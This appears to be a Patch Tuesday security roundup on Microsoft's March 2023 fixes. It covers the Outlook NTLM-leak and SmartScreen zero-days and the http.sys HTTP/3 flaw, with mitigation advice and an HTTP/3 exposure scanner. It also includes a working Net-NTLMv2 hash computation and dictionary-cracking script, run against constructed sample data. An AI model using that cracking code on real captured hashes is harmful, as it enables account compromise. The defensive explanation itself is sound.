This month we got patches for 76 vulnerabilities. According to Microsoft, nine are critical, and two are already being exploited.
The number of bugs in each vulnerability category is listed below:
- 21 Elevation of Privilege Vulnerabilities
- 2 Security Feature Bypass Vulnerabilities
- 27 Remote Code Execution Vulnerabilities
- 15 Information Disclosure Vulnerabilities
- 4 Denial of Service Vulnerabilities
- 10 Spoofing Vulnerabilities
- 1 Edge – Chromium Vulnerability
This month’s Patch Tuesday fixes two zero-day vulnerabilities actively exploited in attacks.
Actively exploited zero-day vulnerabilities
CVE-2023-23397 - Microsoft Outlook Elevation of Privilege Vulnerability
According to the advisory, an attacker who successfully exploits this vulnerability can obtain the user's Net-NTLMv2 hash, which can then be used in an NTLM relay attack against another service to authenticate as that user (or cracked offline if the password is weak). The attacker triggers the bug by sending a specially crafted email; the payload fires automatically when the Outlook client retrieves and processes the message, so exploitation can happen before the email is even rendered in the Preview Pane. No user interaction is required, which is why the CVSS score is 9.8. For environments that cannot patch immediately, the advisory lists two mitigations: add privileged accounts to the Protected Users security group (which prevents those accounts from authenticating with NTLM), and block outbound TCP 445/SMB at the perimeter, local firewall and VPN so the NTLM authentication never reaches an attacker-controlled share. Microsoft also published a PowerShell script that scans Exchange messaging items for messages carrying the malicious property, so you can find out whether anyone in the organization has already received one.
In a private threat analytics report seen by BleepingComputer, Microsoft says that this Outlook vulnerability was exploited by STRONTIUM, a state-sponsored Russian hacking group.
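What actually leaks when Outlook authenticates to the attacker's share is an NTLMv2 response (the NTProofStr and its blob), and the reason it matters is that it can be relayed or attacked offline. The following is an added example, not code from the page, from Microsoft or from any exploit: it implements the NTOWFv2 and NTProofStr computation from MS-NLMP with a pure-Python MD4, simulates the client's response for a constructed capture (user, domain, server challenge, blob and a sample password are all made up here), formats the capture the way hashcat mode 5600 expects, and shows a dictionary attack against it. It deliberately does not craft the Outlook message; it only shows why the leaked material is valuable.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Used instead of hashlib.new('md4'),
    which OpenSSL-3 builds of Python frequently do not provide."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                  # round 1
            f = (b & c) | (~b & d)
            a = _rotl((a + f + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                  # round 2
            g = (b & c) | (b & d) | (c & d)
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                  # round 3
            h = b ^ c ^ d
            k = (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]
            a = _rotl((a + h + x[k] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash (MD4 of the
    UTF-16LE password) over UPPERCASE(user) || domain, both UTF-16LE."""
    nt_hash = md4(password.encode("utf-16le"))
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof_str(password, user, domain, server_challenge, blob) -> bytes:
    """The 16-byte NTProofStr that heads the NtChallengeResponse field."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


# Constructed sample capture: what a rogue SMB server learns from the client's
# CHALLENGE/AUTHENTICATE exchange. None of these values are real.
USER, DOMAIN = "alice", "CORP"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")      # chosen by the rogue server
CLIENT_CHALLENGE = bytes.fromhex("a1b2c3d4e5f60718")      # chosen by the client
TIMESTAMP = struct.pack("<Q", 133226000000000000)         # FILETIME, arbitrary
TARGET_INFO = b"\x02\x00\x08\x00" + "CORP".encode("utf-16le") + b"\x00\x00\x00\x00"  # MsvAvNbDomainName, MsvAvEOL
BLOB = b"\x01\x01" + b"\x00" * 6 + TIMESTAMP + CLIENT_CHALLENGE + b"\x00" * 4 + TARGET_INFO + b"\x00" * 4
_VICTIM_PASSWORD = "Spring2023!"   # unknown to the attacker; used only to simulate the client
WORDLIST = ["password", "Welcome1", "Spring2023!", "Summer2023!"]   # constructed dictionary


def leaked_response(password=_VICTIM_PASSWORD) -> bytes:
    """Simulate the client side: the NTProofStr Outlook would send to the share."""
    return nt_proof_str(password, USER, DOMAIN, SERVER_CHALLENGE, BLOB)


def hashcat_5600(user, domain, server_challenge, proof, blob) -> str:
    """Net-NTLMv2 in the USER::DOMAIN:challenge:NTProofStr:blob form used by hashcat -m 5600."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(proof, user, domain, server_challenge, blob, wordlist):
    """Offline attack: recompute NTProofStr per guess; nothing is sent anywhere."""
    for guess in wordlist:
        if hmac.compare_digest(nt_proof_str(guess, user, domain, server_challenge, blob), proof):
            return guess
    return None


if __name__ == "__main__":
    proof = leaked_response()
    print(hashcat_5600(USER, DOMAIN, SERVER_CHALLENGE, proof, BLOB))
    print("cracked:", crack(proof, USER, DOMAIN, SERVER_CHALLENGE, BLOB, WORDLIST))
```

Two things to take from this: the attacker never needs the NT hash itself, because the response is bound to a challenge the attacker chose, so anything derived from a guessable password falls to a dictionary run; and a relay attack needs no cracking at all, which is why blocking outbound 445 and moving privileged accounts into Protected Users are the mitigations that actually close the exposure while patches roll out.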
CVE-2023-24880 - Windows SmartScreen Security Feature Bypass Vulnerability
According to the advisory, an attacker can craft a malicious file that evades Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of the security features that rely on MOTW tagging, such as Protected View in Microsoft Office. In practice that means a downloaded file carrying such a payload opens without the SmartScreen warning or the Protected View sandbox the MOTW tag would normally trigger. The CVSS score is only 5.4, but the bug was discovered by Google's Threat Analysis Group, which spotted it being exploited in the wild by the Magniber ransomware operation, so the low score should not drive the patching priority here.
Another critical vulnerability worth mentioning
Another critical vulnerability worth mentioning is a Remote Code Execution (RCE) flaw in the HTTP Protocol Stack (http.sys), CVE-2023-23392. A server is vulnerable only if a binding has HTTP/3 enabled and the server uses buffered I/O. HTTP/3 support in http.sys is a new feature of Windows Server 2022 and is opt-in (it is turned on through the EnableHttp3 value under the HTTP\Parameters service key), so the exposed population is smaller than the score suggests, but for servers that do have it enabled the bug requires no user interaction, no privileges and low attack complexity over the network. The CVSS score is 9.8.
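Because exposure to CVE-2023-23392 hinges on whether HTTP/3 is actually enabled, the first practical step is finding the IIS hosts that advertise it. Servers announce HTTP/3 to clients through the Alt-Svc response header (RFC 7838), so the advertisement can be checked from any machine without touching the registry. The following is an added example, not code from the page or from Microsoft: it parses Alt-Svc headers (including comma-separated lists, h3-NN draft identifiers and the "clear" form), flags IIS servers that advertise h3, and includes a live probe helper. The sample header sets are constructed. Caveat: absence of the header does not prove HTTP/3 is off, since a server may only advertise it on HTTP/2 responses; treat a negative result as "not observed", not "not enabled".

```python
import http.client
import ssl

# Constructed sample header sets (not real captures). IIS on Windows Server 2022
# with HTTP/3 enabled advertises it via Alt-Svc; the others are control cases.
SAMPLE_HEADERS = {
    "h3_enabled":  [("Server", "Microsoft-IIS/10.0"),
                    ("Alt-Svc", 'h3=":443"; ma=86400, h3-29=":443"; ma=86400')],
    "h3_disabled": [("Server", "Microsoft-IIS/10.0"), ("Content-Type", "text/html")],
    "other_alt":   [("Server", "nginx"), ("Alt-Svc", 'h2=":443"; ma=3600')],
    "cleared":     [("Server", "Microsoft-IIS/10.0"), ("Alt-Svc", "clear")],
}


def parse_alt_svc(value):
    """Return (protocol-id, authority) pairs from one Alt-Svc header value.
    'clear' withdraws every alternative, so it yields nothing."""
    value = value.strip()
    if not value or value.lower() == "clear":
        return []
    pairs = []
    for alternative in value.split(","):
        head = alternative.strip().split(";", 1)[0].strip()   # drop ma= / persist= parameters
        if "=" not in head:
            continue
        proto, authority = head.split("=", 1)
        pairs.append((proto.strip(), authority.strip().strip('"')))
    return pairs


def advertises_h3(headers):
    """True if any Alt-Svc header lists h3 or an h3-NN draft protocol."""
    for name, value in headers:
        if name.lower() == "alt-svc":
            for proto, _authority in parse_alt_svc(value):
                if proto == "h3" or proto.startswith("h3-"):
                    return True
    return False


def is_iis(headers):
    return any(n.lower() == "server" and v.startswith("Microsoft-IIS") for n, v in headers)


def assess(headers):
    """Summarise one host's headers for an inventory report."""
    return {"iis": is_iis(headers), "h3_advertised": advertises_h3(headers)}


def probe(host, port=443, path="/"):
    """Live check (needs network; not used by the sample data): fetch response
    headers over HTTP/1.1 and report whether the host advertises HTTP/3."""
    conn = http.client.HTTPSConnection(host, port, timeout=10, context=ssl.create_default_context())
    conn.request("HEAD", path, headers={"Host": host})
    headers = conn.getresponse().getheaders()
    conn.close()
    return {"host": host, **assess(headers)}


if __name__ == "__main__":
    for label, headers in SAMPLE_HEADERS.items():
        print(label, assess(headers))
```

Hosts that come back with both `iis` and `h3_advertised` set are the ones to patch first for this CVE; everything else still gets the update, just without the same urgency.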